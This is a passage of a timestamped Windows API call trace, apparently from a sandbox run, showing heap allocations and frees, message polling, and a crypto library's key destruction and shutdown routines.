0x2e511f0 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0257.579] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0257.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0257.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0257.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0257.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0257.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0257.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0257.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0257.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0257.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0257.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0257.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0257.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0257.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0257.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0257.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0257.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51580, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0257.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.655] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0257.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0257.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0257.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0257.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.655] CryptDestroyKey (hKey=0xa87650) returned 1 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0257.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.657] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0257.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0257.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0257.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0257.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.658] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0257.658] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0257.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0257.658] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0257.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c00 [0257.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0257.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0257.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0257.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0257.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0257.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0257.659] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0257.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0257.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0257.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0257.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0257.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0257.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0257.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0257.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0257.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0257.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0257.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0257.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0257.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0257.663] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0257.663] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0257.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0257.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0257.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0257.663] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0257.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0257.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0257.663] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0257.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0257.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0257.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0257.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0257.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0257.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0257.664] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0257.664] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.664] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0257.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0257.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0257.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0257.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0257.665] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0257.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0257.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 